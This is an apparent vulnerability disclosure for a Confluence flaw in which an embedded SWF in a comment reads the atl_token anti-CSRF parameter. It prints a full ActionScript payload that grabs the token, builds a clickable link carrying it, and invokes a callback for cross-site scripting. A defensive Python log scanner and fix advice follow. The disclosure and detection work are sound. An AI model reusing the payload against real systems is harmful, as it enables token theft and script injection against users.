Details

    • CVSS Score: 4.9

      Description

      In the Confluence comment module a user can embed a .swf file in their comment. Confluence uses an `atl_token` parameter on GET HTTP requests, so if the attacker sends the link to the .swf file (the value of `src` on the embed tag) to the victim, the malicious .SWF won't execute in the victim's browser.

      We can bypass this protection by using `this.loaderInfo.parameters` in the malicious .swf: `this.loaderInfo.parameters.parameter_name` extracts the value of the target parameter, in this case `atl_token`. I also inserted an `<a>` tag in the malicious .swf file, so if the victim clicks the link in our embedded .swf file, the .swf file will run in the victim's browser.

      PAYLOAD

      package
      {
          import flash.display.Sprite;
          import flash.text.TextFormat;
          import flash.text.TextField;
          import flash.external.ExternalInterface;

          public class Main extends Sprite
          {
              public function Main()
              {
                  super();
                  var myFormat:TextFormat = new TextFormat();
                  myFormat.size = 200;
                  // Read the atl_token value out of the SWF's own URL query string.
                  var xcode:String = this.loaderInfo.parameters.atl_token;
                  var myText:TextField = new TextField();
                  myText.width = 1000;
                  myText.height = 1000;
                  // Render a clickable link that carries the captured token back in the URL.
                  myText.htmlText = "<font size=\'300px\'> <a target=\'_blank\' href=\'https://pwnie.ninja/confluence/download/attachments/9469955/NewProjectx.swf?atl_token=" + xcode + "&callback=alert\'>CliCK ME</a> </font>";
                  addChild(myText);
                  // Invoke the JavaScript function named by the callback parameter.
                  ExternalInterface.call(this.loaderInfo.parameters.callback, "xss");
              }
          }
      }

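      The root cause above is that a CSRF token appended to a GET URL is readable by whatever the URL loads, including a user-uploaded SWF via loaderInfo.parameters. A defender can look for that pattern in web-server access logs: a file under the attachment download path with an active-content extension being requested with an atl_token (or a callback-name) query parameter. The script below is an added example written for this page, not part of the report or of Confluence; the log format and every sample line are constructed, while the path prefix and parameter names come from the report. The list of risky extensions beyond .swf is an assumption.

```python
"""Flag requests that hand an anti-CSRF token to user-uploaded active content."""
import re
from urllib.parse import parse_qs, urlsplit

# Combined-log-format request line: client, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Confluence attachment download prefix, as seen in the report's payload URL.
ATTACHMENT_PREFIX = "/download/attachments/"
# Extensions a browser or plugin may execute inline. Only .swf appears in the
# report; the others are an assumption about similarly risky uploads.
ACTIVE_EXTENSIONS = (".swf", ".html", ".htm", ".svg")
# Query parameters that must never reach user-controlled content.
TOKEN_PARAMS = ("atl_token",)
# Parameter names the payload uses to choose a JavaScript function to call.
CALLBACK_PARAMS = ("callback",)

# Constructed sample log lines (not from the report); token values are fake.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /confluence/download/attachments/9469955/NewProjectx.swf?atl_token=tok-constructed-1&callback=alert HTTP/1.1" 200 4120
10.0.0.6 - - [01/Jan/2020:10:00:01 +0000] "GET /confluence/download/attachments/9469955/report.pdf HTTP/1.1" 200 88210
10.0.0.7 - - [01/Jan/2020:10:00:02 +0000] "GET /confluence/pages/viewpage.action?pageId=9469955&atl_token=tok-constructed-1 HTTP/1.1" 200 9000
10.0.0.8 - - [01/Jan/2020:10:00:03 +0000] "GET /confluence/download/attachments/9469955/banner.swf HTTP/1.1" 200 3001
10.0.0.9 - - [01/Jan/2020:10:00:04 +0000] "GET /confluence/download/attachments/9469955/widget.swf?callback=alert HTTP/1.1" 200 2990
this line is not an access-log entry and is skipped
"""


def parse_line(line):
    """Return (client, method, path, query-dict) for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    query = parse_qs(parts.query, keep_blank_values=True)
    return m.group("client"), m.group("method"), parts.path, query


def is_active_attachment(path):
    """True if the path is an uploaded file a browser may execute inline."""
    return ATTACHMENT_PREFIX in path and path.lower().endswith(ACTIVE_EXTENSIONS)


def find_token_leaks(log_text):
    """One finding per request that passes a token or callback name to an
    active attachment; token-bearing requests to normal pages are ignored."""
    findings = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        client, method, path, query = parsed
        if not is_active_attachment(path):
            continue
        leaked = [p for p in TOKEN_PARAMS if p in query]
        callbacks = [p for p in CALLBACK_PARAMS if p in query]
        if leaked or callbacks:
            findings.append({
                "client": client,
                "method": method,
                "path": path,
                "leaked_params": leaked,
                "callback_params": callbacks,
            })
    return findings


if __name__ == "__main__":
    for f in find_token_leaks(SAMPLE_LOG):
        print(f"{f['client']} fetched {f['path']} with "
              f"{f['leaked_params'] + f['callback_params']}")
```

      On the sample input only the two SWF requests that carry a token or a callback name are reported; the PDF download, the plain SWF fetch and the token on a regular page view are not. The same log scan is cheap enough to run continuously, and the durable fix is to stop putting the token in URLs that load user-supplied content and to serve attachments with a Content-Disposition of attachment or from a separate origin.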
